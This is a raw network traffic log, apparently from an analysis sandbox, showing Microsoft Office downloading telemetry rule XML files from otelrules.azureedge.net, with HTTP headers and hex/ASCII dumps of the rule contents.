                                                                                                                                                                                                                                            2024-11-14 12:02:52 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            35192.168.2.44979213.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:28 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:29 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 467
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                                            x-ms-request-id: 6ba2b82c-f01e-0071-33a3-34431c000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120229Z-1749fc9bdbdjgplnhC1DFWhrks00000002c00000000060r5
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:29 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
                                                                                                                                                                                                                                            2024-11-14 12:02:53 UTC192OUTGET /rules/rule703451v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:53 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:53 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1409
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDFC438CF"
                                                                                                                                                                                                                                            x-ms-request-id: 86712c9d-c01e-007a-5916-36b877000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120253Z-1749fc9bdbdhnf7rhC1DFWgd0n00000002hg0000000040tz
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:53 UTC1409INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            36192.168.2.44979313.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:29 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:29 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:29 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                                            x-ms-request-id: b90175c0-c01e-008e-4b8d-367381000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120229Z-r178fb8d765mjvjchC1DFWhkyn000000027g00000000d5fn
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_MISS
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:29 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">
                                                                                                                                                                                                                                            2024-11-14 12:02:53 UTC192OUTGET /rules/rule703450v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:53 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:53 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1372
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE6669CA7"
                                                                                                                                                                                                                                            x-ms-request-id: a6ca8360-701e-000d-0101-366de3000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120253Z-1749fc9bdbd6szhxhC1DFW199s00000002h0000000005dyv
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:53 UTC1372INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            37192.168.2.44979413.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:29 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:29 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                                            x-ms-request-id: 52c466ac-c01e-007a-7901-2db877000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120229Z-16547b76f7fj897nhC1DFWdwq40000000kd000000000amp5
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:29 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
                                                                                                                                                                                                                                            2024-11-14 12:02:53 UTC192OUTGET /rules/rule700901v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:53 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:53 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1408
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE1038EF2"
                                                                                                                                                                                                                                            x-ms-request-id: 295439a2-001e-0065-3ad2-2c0b73000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120253Z-16547b76f7fx6rhxhC1DFW76kg0000000kk0000000009138
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:53 UTC1408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            38192.168.2.44979513.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:29 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:29 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:29 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                                            x-ms-request-id: 30929569-101e-008d-79ff-2c92e5000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120229Z-16547b76f7fk9g8vhC1DFW825400000000fg000000001hbb
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:29 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"
                                                                                                                                                                                                                                            2024-11-14 12:02:54 UTC192OUTGET /rules/rule700900v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:54 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:54 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1371
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:06 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BED3D048D"
                                                                                                                                                                                                                                            x-ms-request-id: 5a9e749e-101e-000b-39d2-2c5e5c000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120254Z-16547b76f7fk9g8vhC1DFW825400000000hg000000001hu0
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:54 UTC1371INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6f 66 69 6e 67 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" /> <F


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            39192.168.2.44979613.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:29 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:29 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                                            x-ms-request-id: 2e9646c6-a01e-0098-2aa5-348556000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120229Z-r178fb8d765j7nnvhC1DFW39w400000001fg00000000dpwx
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:30 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
